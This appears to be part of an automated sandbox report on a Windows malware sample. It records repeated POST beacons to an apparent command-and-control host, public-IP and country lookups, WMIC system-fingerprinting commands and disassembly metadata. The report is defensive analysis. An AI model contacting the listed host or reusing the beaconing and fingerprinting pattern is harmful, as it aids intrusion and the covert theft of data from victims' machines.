Dec 16, 2024 12:19:59.537695885 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:00.806158066 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:00 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49928	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:01.037542105 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:02.316968918 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:02 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49932	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:02.621758938 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:04.030149937 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:03 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49936	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:04.256405115 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:05.513976097 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:05 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49941	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:05.742789030 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:06.998188972 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:06 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49945	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:07.225100994 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:08.529226065 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:08 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49949	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:08.758769989 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:10.064316988 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:09 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49955	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:10.302959919 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:11.619467020 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:11 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49958	31.13.224.69	8080	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 12:20:11.850428104 CET	225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 450 Host: xscapezo.capetown:8080
Dec 16, 2024 12:20:13.461311102 CET	167	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 11:20:13 GMT Content-Length: 50 Content-Type: text/plain; charset=utf-8 Data Raw: 36 65 39 38 61 34 63 35 34 62 62 38 63 30 31 65 38 36 37 37 63 37 39 30 34 64 38 65 39 32 62 62 32 33 61 31 64 39 65 34 63 61 65 35 66 64 34 64 30 36 Data Ascii: 6e98a4c54bb8c01e8677c7904d8e92bb23a1d9e4cae5fd4d06

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	52.17.181.189	443	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 11:18:21 UTC	187	OUT	GET / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: checkip.amazonaws.com
2024-12-16 11:18:22 UTC	237	IN	HTTP/1.1 200 Date: Mon, 16 Dec 2024 11:18:21 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 13 Connection: close Server: nginx Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers
2024-12-16 11:18:22 UTC	13	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	34.117.59.81	443	6208	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 11:18:23 UTC	182	OUT	GET /country HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ipinfo.io
2024-12-16 11:18:23 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Mon, 16 Dec 2024 11:18:23 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-16 11:18:23 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Analysis Process: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exePID: 6208, Parent PID: 2580

General

Target ID:	0
Start time:	06:18:06
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe"
Imagebase:	0xee0000
File size:	231'936 bytes
MD5 hash:	5B74BA5D3F7A0AFF3DEA2D3AE9BB1A59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	06:18:23
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic os get Name
Imagebase:	0x930000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:18:23
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:18:24
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic cpu get name
Imagebase:	0x930000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:18:24
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:18:26
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x930000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:18:26
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exePID: 6208, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	46.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	97

Executed Functions

Function 00EF4CD7 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 674COMMON

Download Yara Rule

APIs

Part of subcall function 00EE5C7F: MultiByteToWideChar.KERNEL32 ref: 00EE5CD0
Part of subcall function 00EE5C7F: MultiByteToWideChar.KERNEL32 ref: 00EE5D17

CoInitialize.OLE32 ref: 00EF4FE0
SysFreeString.OLEAUT32 ref: 00EF5050
SysFreeString.OLEAUT32 ref: 00EF509A
VariantClear.OLEAUT32 ref: 00EF5364
SysFreeString.OLEAUT32(00000000), ref: 00EF547C
SysFreeString.OLEAUT32 ref: 00EF5489
SysFreeString.OLEAUT32 ref: 00EF5496

Strings

com.nim, xrefs: 00EF516B, 00EF5610, 00EF564D
invoke, xrefs: 00EF5173, 00EF5618, 00EF5655
COMException, xrefs: 00EF54C3, 00EF560B
COMError, xrefs: 00EF5166, 00EF5648
, xrefs: 00EF4F60

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: FreeString$ByteCharMultiWide$ClearInitializeVariant
String ID: $COMError$COMException$com.nim$invoke
API String ID: 3707380375-1182642905
Opcode ID: fa8c2274e2409aea218da3172d8ed092a0850b6d255d4713282fdea9902eb308
Instruction ID: 2cff1fd8f11a0494dfe7722656add0434a64e58991133ac696f0aa55c75ab584
Opcode Fuzzy Hash: fa8c2274e2409aea218da3172d8ed092a0850b6d255d4713282fdea9902eb308
Instruction Fuzzy Hash: 736286B190476D8FDB21DF68C8847ADBBF1BF55304F149199E688AB342DB709885CF82

Function 00EF60C9 Relevance: 18.8, APIs: 2, Strings: 8, Instructions: 1255COMMON

Download Yara Rule

Strings

-, xrefs: 00EF760D
parseHook, xrefs: 00EF6B21, 00EF7535, 00EF761D
fromHex, xrefs: 00EF6276
JsonError, xrefs: 00EF6989, 00EF6B09, 00EF6CED, 00EF6DA6, 00EF6E25, 00EF6FA5, 00EF7479, 00EF751D, 00EF7594, 00EF7605
strutils.nim, xrefs: 00EF626E
ValueError, xrefs: 00EF61FB, 00EF625E
parseObjectInner, xrefs: 00EF6DBE, 00EF6FBD
jsony.nim, xrefs: 00EF6B19, 00EF6DB6, 00EF6FB5, 00EF752D, 00EF7615

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: -$JsonError$ValueError$fromHex$jsony.nim$parseHook$parseObjectInner$strutils.nim
API String ID: 0-130352387
Opcode ID: 162e8df1d9234f3955f97b0c36f1da2db6a3c0e7050b9c64befd089fdb95a520
Instruction ID: e2d2123e1bc4e9e7a09bf80a96efcdf7d547befe082f05249219950175e06944
Opcode Fuzzy Hash: 162e8df1d9234f3955f97b0c36f1da2db6a3c0e7050b9c64befd089fdb95a520
Instruction Fuzzy Hash: BFD237B0A042AD8FDB60DF14C8807A9B7F1AF45308F0490E9E689B7252DB749EC5DF59

Function 00EEAF50 Relevance: 18.4, APIs: 6, Strings: 4, Instructions: 898comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EEAFED
GetActiveObject.OLEAUT32 ref: 00EEB0EA
CoCreateInstance.COMBASE ref: 00EEB124
CoGetObject.OLE32 ref: 00EEB23E

Part of subcall function 00EE74EF: VariantClear.OLEAUT32 ref: 00EE751A

SysFreeString.OLEAUT32 ref: 00EEB6AE
VariantClear.OLEAUT32 ref: 00EEBA77

Strings

com.nim, xrefs: 00EEB26E, 00EEB878
GetAV, xrefs: 00EEB885
GetObject, xrefs: 00EEB276
COMError, xrefs: 00EEB269, 00EEB880

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ClearObjectVariant$ActiveCreateFreeInitializeInstanceString
String ID: COMError$GetAV$GetObject$com.nim
API String ID: 1187925771-4142695778
Opcode ID: 4a135afc53281e1a1b55605063c1fb384fba871e1b780dad30fa4af6b0a88ee2
Instruction ID: 7a1f9f64528da87d038f6d945fbd7003de562d953008f5bc1687d00f91442f00
Opcode Fuzzy Hash: 4a135afc53281e1a1b55605063c1fb384fba871e1b780dad30fa4af6b0a88ee2
Instruction Fuzzy Hash: B0827B70D0439C8FDF21AF66C89079EBBF1AF56304F149099E498AB356DB748885DF82

Function 00F016A0 Relevance: 12.1, APIs: 8, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce04eeea5b3d0211f5ce340a8df32c2575fa21cac55e78b94e201d4b81fc630
Instruction ID: b379337ff6764faebde9ace538639f2568fc6f839b1cefe3824569e686f05c2a
Opcode Fuzzy Hash: 4ce04eeea5b3d0211f5ce340a8df32c2575fa21cac55e78b94e201d4b81fc630
Instruction Fuzzy Hash: 6C516E71A097058FC710EF65C98465AB7E5FF84350F06892DE8888B381EB35E945FB82

Function 00EE1148 Relevance: 7.6, APIs: 5, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_amsg_exit.MSVCRT ref: 00EE11DE
_initterm.MSVCRT ref: 00EE1231
__p__acmdln.MSVCRT ref: 00EE12BD
exit.MSVCRT ref: 00EE13AA
_cexit.MSVCRT ref: 00EE13B8

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: __p__acmdln_amsg_exit_cexit_inittermexit
String ID:
API String ID: 3774341475-0
Opcode ID: f4650fc7d9ad1c2828f06ddf1688dc214714c51b1270547abfaa556f845f7e34
Instruction ID: ca04abef2a50adcfdb76d1d01d9833e0f145ee653fc7af2ddda1194f295e7cc7
Opcode Fuzzy Hash: f4650fc7d9ad1c2828f06ddf1688dc214714c51b1270547abfaa556f845f7e34
Instruction Fuzzy Hash: 2A615BB0A0428CCFCB50DFA5D9847ADBBF0FB09348F119499E854AB361C7749985EF51

Function 00EE1189 Relevance: 7.6, APIs: 5, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_amsg_exit.MSVCRT ref: 00EE11DE
_initterm.MSVCRT ref: 00EE1231
__p__acmdln.MSVCRT ref: 00EE12BD
exit.MSVCRT ref: 00EE13AA
_cexit.MSVCRT ref: 00EE13B8

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: __p__acmdln_amsg_exit_cexit_inittermexit
String ID:
API String ID: 3774341475-0
Opcode ID: 394bbd5e45a06170c969ee34080854a7192dd31e319ea88b3c754fb2aa96abcd
Instruction ID: 9b60b7b2f056525f51793f530d24ec92335d7a31d1a87a913cca231561f8afb9
Opcode Fuzzy Hash: 394bbd5e45a06170c969ee34080854a7192dd31e319ea88b3c754fb2aa96abcd
Instruction Fuzzy Hash: 94417F7090428CCFCB40DF95D9807ADBBF0BB44344F029499E894AB361CB74C985FB52

Function 00EE1207 Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.MSVCRT ref: 00EE1207
_initterm.MSVCRT ref: 00EE1231
__p__acmdln.MSVCRT ref: 00EE12BD
exit.MSVCRT ref: 00EE13AA
_cexit.MSVCRT ref: 00EE13B8

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: _initterm$__p__acmdln_cexitexit
String ID:
API String ID: 1163873781-0
Opcode ID: f92cd0675a8fb70306be47a059a1cd3fb90ea16460b1f0a69d832ff1a4932d54
Instruction ID: 4689a5f0d32f06aec3f7e59836bdfe4b2733372f592077f8ea4212f7483abdbc
Opcode Fuzzy Hash: f92cd0675a8fb70306be47a059a1cd3fb90ea16460b1f0a69d832ff1a4932d54
Instruction Fuzzy Hash: 19417F7090428CCFCB50DF65DA817ADBBF1BB48344F029499E894AB361CB74D985FB52

Function 00EE9CAD Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 553
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32 ref: 00EE9FA1
GetExitCodeProcess.KERNELBASE ref: 00EE9FCA

Strings

D, xrefs: 00EE9DFE

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
